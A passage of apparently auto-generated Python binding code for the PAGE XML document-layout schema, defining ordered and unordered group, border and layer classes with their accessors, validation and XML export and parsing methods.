MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('RegionRefIndexed', 'RegionRefIndexedType', 1, 0, {'name': 'RegionRefIndexed', 'type': 'RegionRefIndexedType'}, 5),
MemberSpec_('OrderedGroupIndexed', 'OrderedGroupIndexedType', 1, 0, {'name': 'OrderedGroupIndexed', 'type': 'OrderedGroupIndexedType'}, 5),
MemberSpec_('UnorderedGroupIndexed', 'UnorderedGroupIndexedType', 1, 0, {'name': 'UnorderedGroupIndexed', 'type': 'UnorderedGroupIndexedType'}, 5),
]
subclass = None
superclass = None
def __init__(self, id=None, regionRef=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
self.caption = _cast(None, caption)
self.caption_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if RegionRefIndexed is None:
self.RegionRefIndexed = []
else:
self.RegionRefIndexed = RegionRefIndexed
self.RegionRefIndexed_nsprefix_ = "pc"
if OrderedGroupIndexed is None:
self.OrderedGroupIndexed = []
else:
self.OrderedGroupIndexed = OrderedGroupIndexed
self.OrderedGroupIndexed_nsprefix_ = "pc"
if UnorderedGroupIndexed is None:
self.UnorderedGroupIndexed = []
else:
self.UnorderedGroupIndexed = UnorderedGroupIndexed
self.UnorderedGroupIndexed_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, OrderedGroupType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if OrderedGroupType.subclass:
return OrderedGroupType.subclass(*args_, **kwargs_)
else:
return OrderedGroupType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_RegionRefIndexed(self):
return self.RegionRefIndexed
def set_RegionRefIndexed(self, RegionRefIndexed):
self.RegionRefIndexed = RegionRefIndexed
def add_RegionRefIndexed(self, value):
self.RegionRefIndexed.append(value)
def insert_RegionRefIndexed_at(self, index, value):
self.RegionRefIndexed.insert(index, value)
def replace_RegionRefIndexed_at(self, index, value):
self.RegionRefIndexed[index] = value
def get_OrderedGroupIndexed(self):
return self.OrderedGroupIndexed
def set_OrderedGroupIndexed(self, OrderedGroupIndexed):
self.OrderedGroupIndexed = OrderedGroupIndexed
def add_OrderedGroupIndexed(self, value):
self.OrderedGroupIndexed.append(value)
def insert_OrderedGroupIndexed_at(self, index, value):
self.OrderedGroupIndexed.insert(index, value)
def replace_OrderedGroupIndexed_at(self, index, value):
self.OrderedGroupIndexed[index] = value
def get_UnorderedGroupIndexed(self):
return self.UnorderedGroupIndexed
def set_UnorderedGroupIndexed(self, UnorderedGroupIndexed):
self.UnorderedGroupIndexed = UnorderedGroupIndexed
def add_UnorderedGroupIndexed(self, value):
self.UnorderedGroupIndexed.append(value)
def insert_UnorderedGroupIndexed_at(self, index, value):
self.UnorderedGroupIndexed.insert(index, value)
def replace_UnorderedGroupIndexed_at(self, index, value):
self.UnorderedGroupIndexed[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def get_caption(self):
return self.caption
def set_caption(self, caption):
self.caption = caption
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRefIndexed or
self.OrderedGroupIndexed or
self.UnorderedGroupIndexed
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('OrderedGroupType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'OrderedGroupType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='OrderedGroupType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='OrderedGroupType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='OrderedGroupType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
if self.caption is not None and 'caption' not in already_processed:
already_processed.add('caption')
outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.continuation is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='OrderedGroupType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for RegionRefIndexed_ in self.RegionRefIndexed:
namespaceprefix_ = self.RegionRefIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRefIndexed_nsprefix_) else ''
RegionRefIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRefIndexed', pretty_print=pretty_print)
for OrderedGroupIndexed_ in self.OrderedGroupIndexed:
namespaceprefix_ = self.OrderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroupIndexed_nsprefix_) else ''
OrderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroupIndexed', pretty_print=pretty_print)
for UnorderedGroupIndexed_ in self.UnorderedGroupIndexed:
namespaceprefix_ = self.UnorderedGroupIndexed_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroupIndexed_nsprefix_) else ''
UnorderedGroupIndexed_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroupIndexed', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
value = find_attr_value_('caption', node)
if value is not None and 'caption' not in already_processed:
already_processed.add('caption')
self.caption = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
value = find_attr_value_('continuation', node)
if value is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
if value in ('true', '1'):
self.continuation = True
elif value in ('false', '0'):
self.continuation = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'RegionRefIndexed':
obj_ = RegionRefIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.RegionRefIndexed.append(obj_)
obj_.original_tagname_ = 'RegionRefIndexed'
elif nodeName_ == 'OrderedGroupIndexed':
obj_ = OrderedGroupIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroupIndexed.append(obj_)
obj_.original_tagname_ = 'OrderedGroupIndexed'
elif nodeName_ == 'UnorderedGroupIndexed':
obj_ = UnorderedGroupIndexedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroupIndexed.append(obj_)
obj_.original_tagname_ = 'UnorderedGroupIndexed'
# end class OrderedGroupType
class UnorderedGroupType(GeneratedsSuper):
"""Numbered group (contains unordered elements)
Optional link to a parent region of nested regions.
The parent region doubles as reading order group.
Only the nested regions should be allowed as group members.
Is this group a continuation of another group
(from previous column or page, for example)?
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('regionRef', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('caption', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:GroupTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('continuation', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('RegionRef', 'RegionRefType', 1, 0, {'name': 'RegionRef', 'type': 'RegionRefType'}, 6),
MemberSpec_('OrderedGroup', 'OrderedGroupType', 1, 0, {'name': 'OrderedGroup', 'type': 'OrderedGroupType'}, 6),
MemberSpec_('UnorderedGroup', 'UnorderedGroupType', 1, 0, {'name': 'UnorderedGroup', 'type': 'UnorderedGroupType'}, 6),
]
subclass = None
superclass = None
def __init__(self, id=None, regionRef=None, caption=None, type_=None, continuation=None, custom=None, comments=None, UserDefined=None, Labels=None, RegionRef=None, OrderedGroup=None, UnorderedGroup=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.regionRef = _cast(None, regionRef)
self.regionRef_nsprefix_ = None
self.caption = _cast(None, caption)
self.caption_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.continuation = _cast(bool, continuation)
self.continuation_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if RegionRef is None:
self.RegionRef = []
else:
self.RegionRef = RegionRef
self.RegionRef_nsprefix_ = "pc"
if OrderedGroup is None:
self.OrderedGroup = []
else:
self.OrderedGroup = OrderedGroup
self.OrderedGroup_nsprefix_ = "pc"
if UnorderedGroup is None:
self.UnorderedGroup = []
else:
self.UnorderedGroup = UnorderedGroup
self.UnorderedGroup_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, UnorderedGroupType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if UnorderedGroupType.subclass:
return UnorderedGroupType.subclass(*args_, **kwargs_)
else:
return UnorderedGroupType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_RegionRef(self):
return self.RegionRef
def set_RegionRef(self, RegionRef):
self.RegionRef = RegionRef
def add_RegionRef(self, value):
self.RegionRef.append(value)
def insert_RegionRef_at(self, index, value):
self.RegionRef.insert(index, value)
def replace_RegionRef_at(self, index, value):
self.RegionRef[index] = value
def get_OrderedGroup(self):
return self.OrderedGroup
def set_OrderedGroup(self, OrderedGroup):
self.OrderedGroup = OrderedGroup
def add_OrderedGroup(self, value):
self.OrderedGroup.append(value)
def insert_OrderedGroup_at(self, index, value):
self.OrderedGroup.insert(index, value)
def replace_OrderedGroup_at(self, index, value):
self.OrderedGroup[index] = value
def get_UnorderedGroup(self):
return self.UnorderedGroup
def set_UnorderedGroup(self, UnorderedGroup):
self.UnorderedGroup = UnorderedGroup
def add_UnorderedGroup(self, value):
self.UnorderedGroup.append(value)
def insert_UnorderedGroup_at(self, index, value):
self.UnorderedGroup.insert(index, value)
def replace_UnorderedGroup_at(self, index, value):
self.UnorderedGroup[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_regionRef(self):
return self.regionRef
def set_regionRef(self, regionRef):
self.regionRef = regionRef
def get_caption(self):
return self.caption
def set_caption(self, caption):
self.caption = caption
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_continuation(self):
return self.continuation
def set_continuation(self, continuation):
self.continuation = continuation
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_GroupTypeSimpleType(self, value):
# Validate type pc:GroupTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'list', 'list-item', 'figure', 'article', 'div', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GroupTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.UserDefined is not None or
self.Labels or
self.RegionRef or
self.OrderedGroup or
self.UnorderedGroup
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('UnorderedGroupType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'UnorderedGroupType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='UnorderedGroupType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='UnorderedGroupType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='UnorderedGroupType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.regionRef is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
if self.caption is not None and 'caption' not in already_processed:
already_processed.add('caption')
outfile.write(' caption=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.caption), input_name='caption')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.continuation is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
outfile.write(' continuation="%s"' % self.gds_format_boolean(self.continuation, input_name='continuation'))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='UnorderedGroupType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for RegionRef_ in self.RegionRef:
namespaceprefix_ = self.RegionRef_nsprefix_ + ':' if (UseCapturedNS_ and self.RegionRef_nsprefix_) else ''
RegionRef_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='RegionRef', pretty_print=pretty_print)
for OrderedGroup_ in self.OrderedGroup:
namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
OrderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
for UnorderedGroup_ in self.UnorderedGroup:
namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
UnorderedGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('regionRef', node)
if value is not None and 'regionRef' not in already_processed:
already_processed.add('regionRef')
self.regionRef = value
value = find_attr_value_('caption', node)
if value is not None and 'caption' not in already_processed:
already_processed.add('caption')
self.caption = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_GroupTypeSimpleType(self.type_) # validate type GroupTypeSimpleType
value = find_attr_value_('continuation', node)
if value is not None and 'continuation' not in already_processed:
already_processed.add('continuation')
if value in ('true', '1'):
self.continuation = True
elif value in ('false', '0'):
self.continuation = False
else:
raise_parse_error(node, 'Bad boolean attribute')
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'RegionRef':
obj_ = RegionRefType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.RegionRef.append(obj_)
obj_.original_tagname_ = 'RegionRef'
elif nodeName_ == 'OrderedGroup':
obj_ = OrderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.OrderedGroup.append(obj_)
obj_.original_tagname_ = 'OrderedGroup'
elif nodeName_ == 'UnorderedGroup':
obj_ = UnorderedGroupType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnorderedGroup.append(obj_)
obj_.original_tagname_ = 'UnorderedGroup'
# end class UnorderedGroupType
class BorderType(GeneratedsSuper):
"""Border of the actual page (if the scanned image
contains parts not belonging to the page)."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
]
subclass = None
superclass = None
def __init__(self, Coords=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, BorderType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if BorderType.subclass:
return BorderType.subclass(*args_, **kwargs_)
else:
return BorderType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def hasContent_(self):
if (
self.Coords is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BorderType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('BorderType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'BorderType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='BorderType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='BorderType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='BorderType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='BorderType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class BorderType
class LayersType(GeneratedsSuper):
"""Can be used to express the z-index of overlapping
regions. An element with a greater z-index is always in
front of another element with lower z-index."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('Layer', 'LayerType', 1, 0, {'maxOccurs': 'unbounded', 'minOccurs': '1', 'name': 'Layer', 'type': 'LayerType'}, None),
]
subclass = None
superclass = None
def __init__(self, Layer=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
